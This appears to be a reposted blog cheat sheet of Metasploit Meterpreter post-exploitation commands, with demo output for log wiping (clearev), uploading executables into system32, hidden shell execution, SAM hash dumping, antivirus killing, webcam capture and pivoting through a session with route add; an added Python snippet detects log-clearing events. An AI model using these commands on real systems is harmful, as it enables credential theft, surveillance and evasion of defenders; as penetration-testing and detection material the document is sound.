
Meterpreter Basic Commands

程序员文章站 2024-03-19 13:44:10

Reference:
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

help

background

Puts the currently open session into the background.

cat

Prints the contents of a file.

cd && pwd

clearev

Clears the Application, System, and Security logs on Windows.

Demo

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
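
From the defender's side, the wipe shown above leaves its own trace: Windows records event ID 1102 in the Security log when that log is cleared, and event ID 104 in the System log when another log is cleared. The Python below is an added example, not part of the original post; it parses event XML (simplified from `wevtutil` XML output, wrapped in an `<Events>` root) and flags several logs cleared within one minute. The sample records, account names, and the 60-second window are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Windows writes event 1102 to Security when that log is cleared, and event 104
# to System when another log (Application, System, ...) is cleared.
CLEAR_IDS = {1102, 104}
NS = 'xmlns="http://schemas.microsoft.com/win/2004/08/events/event"'
# Constructed sample records (not real data), simplified from wevtutil XML output.
SAMPLE = f"""<Events>
<Event {NS}><System><EventID>7036</EventID><TimeCreated SystemTime="2024-01-01T09:58:00.000000000Z"/></System></Event>
<Event {NS}><System><EventID>104</EventID><TimeCreated SystemTime="2024-01-01T10:00:00.100000000Z"/></System><UserData><LogFileCleared><SubjectUserName>alice</SubjectUserName><Channel>Application</Channel></LogFileCleared></UserData></Event>
<Event {NS}><System><EventID>104</EventID><TimeCreated SystemTime="2024-01-01T10:00:00.400000000Z"/></System><UserData><LogFileCleared><SubjectUserName>alice</SubjectUserName><Channel>System</Channel></LogFileCleared></UserData></Event>
<Event {NS}><System><EventID>1102</EventID><TimeCreated SystemTime="2024-01-01T10:00:01.000000000Z"/></System><UserData><LogFileCleared><SubjectUserName>alice</SubjectUserName></LogFileCleared></UserData></Event>
<Event {NS}><System><EventID>104</EventID><TimeCreated SystemTime="2024-01-01T15:30:00.000000000Z"/></System><UserData><LogFileCleared><SubjectUserName>bob</SubjectUserName><Channel>Setup</Channel></LogFileCleared></UserData></Event>
</Events>"""

def _find(el, name):
    # First element (el itself or a descendant) named `name`, ignoring namespaces.
    return next((e for e in el.iter() if e.tag.rsplit("}", 1)[-1] == name), None)

def _text(el, name, default):
    node = _find(el, name) if el is not None else None
    return node.text if node is not None and node.text else default

def log_clear_events(xml_text):
    """Return one dict per log-clear event: time, cleared log name, account."""
    found = []
    for ev in ET.fromstring(xml_text):
        system = _find(ev, "System")
        eid = int(_text(system, "EventID", "0"))
        if eid not in CLEAR_IDS:
            continue
        stamp = _find(system, "TimeCreated").get("SystemTime")[:19]  # drop fraction and Z
        cleared = _find(ev, "LogFileCleared")
        found.append({"time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S"),
                      "log": "Security" if eid == 1102 else _text(cleared, "Channel", "unknown"),
                      "user": _text(cleared, "SubjectUserName", "unknown")})
    return found

def bulk_wipes(events, window=timedelta(seconds=60), min_logs=2):
    """Group clears starting within `window`; report groups touching >= min_logs logs."""
    bursts, current = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        if current and ev["time"] - current[0]["time"] > window:
            bursts.append(current)
            current = []
        current.append(ev)
    bursts.append(current)
    return [logs for logs in (sorted({e["log"] for e in b}) for b in bursts) if len(logs) >= min_logs]

print(bulk_wipes(log_clear_events(SAMPLE)))
```

A single cleared log, like the constructed `Setup` record, is listed by `log_clear_events` but not reported as a bulk wipe.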

upload

Demo

meterpreter > upload evil_*.exe c:\\windows\\system32
[*] uploading  : evil_*.exe -> c:\windows\system32
[*] uploaded   : evil_*.exe -> c:\windows\system32\evil_*.exe

download

edit

Edits a text file using vim.

execute

Runs an executable file.

Demo

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

hashdump

Dumps the contents of the SAM database.

idletime

Displays the number of seconds that the user at the remote machine has been idle.

ipconfig <=> ifconfig /all

ps <=> tasklist

search

Locates specific files on the target host. The command can search the whole system or specific folders.

Demo

meterpreter > search -f autoexec.bat
Found 1 result...
    c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)

shell

run killav

Kills antivirus software.

run post/windows/gather/enum_applications

Gets information about installed software.

run post/windows/gather/dumplinks

Shows recent file activity on the target machine.

webcam_list

Displays the currently available webcams on the target host.

Demo

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)

resource ?

Executes Meterpreter instructions located inside a text file. The file contains one entry per line, and "resource" executes each line in sequence. This can help automate repetitive actions performed by a user.

By default, the commands run in the current working directory on the target machine, and the resource file is read from the local working directory on the attacking machine.

webcam_snap

Grabs a picture from a connected webcam on the target system and saves it to disk as a JPEG image. By default, the save location is the local current working directory, with a randomized filename.

After obtaining a Meterpreter session, the victim can be used as the next hop into another network it is connected to, that is, by adding a route.

msf > route help
Route traffic destined to a given subnet through a supplied session.

Usage:
  route [add/remove] subnet netmask [comm/sid]
  route [add/remove] cidr [comm/sid]
  route [get] <host or network>
  route [flush]
  route [print]

Subcommands:
  add - make a new route
  remove - delete a route; 'del' is an alias
  flush - remove all routes
  get - display the route for a given target
  print - show all active routes

Examples:
  Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1
    route add 192.168.0.0 255.255.255.0 1
    route add 192.168.0.0/24 1

  Delete the above route
    route remove 192.168.0.0/24 1
    route del 192.168.0.0 255.255.255.0 1

  Display the route that would be used for the given host or network
    route get 192.168.0.11

First, view the routes from within the session:

meterpreter > route

After viewing the routes, put the session into the background.

meterpreter > background

Then add the route.

msf > route add 10.0.0.0/24 1

This means that all traffic destined for 10.0.0.0/24 is forwarded through session 1.

You can then run

use auxiliary/scanner/smb/smb_version

to check the operating system version.

Reference:
https://www.youtube.com/watch?v=HDhlP2OjgHU
